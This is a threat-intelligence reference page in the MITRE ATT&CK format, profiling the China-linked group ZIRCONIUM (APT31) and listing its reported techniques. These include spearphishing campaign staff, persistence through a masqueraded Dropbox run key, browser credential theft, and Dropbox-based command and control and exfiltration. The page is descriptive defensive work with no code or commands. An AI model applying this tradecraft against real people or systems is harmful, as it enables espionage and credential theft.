Skip to content

G0128 ZIRCONIUM

ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.12

Item Value
ID G0128
Associated Names APT31
Version 1.0
Created 24 March 2021
Last Modified 20 April 2021
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
APT31 2

Techniques Used

Domain ID Name Use
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains ZIRCONIUM has purchased domains for use in targeted campaigns.1
enterprise T1583.006 Web Services ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.43
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder ZIRCONIUM has created a Registry Run key named Dropbox Update Setup to establish persistence for a malicious Python binary.3
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.003 Windows Command Shell ZIRCONIUM has used a tool to open a Windows Command Shell on a remote host.3
enterprise T1059.006 Python ZIRCONIUM has used Python-based implants to interact with compromised hosts.43
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers ZIRCONIUM has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.3
enterprise T1140 Deobfuscate/Decode Files or Information ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.2
enterprise T1573 Encrypted Channel -
enterprise T1573.001 Symmetric Cryptography ZIRCONIUM has used AES encrypted communications in C2.3
enterprise T1041 Exfiltration Over C2 Channel ZIRCONIUM has exfiltrated files via the Dropbox API C2.3
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage ZIRCONIUM has exfiltrated stolen data to Dropbox.3
enterprise T1068 Exploitation for Privilege Escalation ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation.2
enterprise T1105 Ingress Tool Transfer ZIRCONIUM has used tools to download malicious files to compromised hosts.3
enterprise T1036 Masquerading ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.43
enterprise T1036.004 Masquerade Task or Service ZIRCONIUM has created a run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary.3
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing ZIRCONIUM has used multi-stage packers for exploit code.2
enterprise T1566 Phishing -
enterprise T1566.002 Spearphishing Link ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL’s.143
enterprise T1598 Phishing for Information ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.4
enterprise T1012 Query Registry ZIRCONIUM has used a tool to query the Registry for proxy settings.3
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.007 Msiexec ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.3
enterprise T1082 System Information Discovery ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.3
enterprise T1016 System Network Configuration Discovery ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.3
enterprise T1033 System Owner/User Discovery ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2.3
enterprise T1124 System Time Discovery ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.3
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.43
enterprise T1102 Web Service -
enterprise T1102.002 Bidirectional Communication ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.43

References

Back to top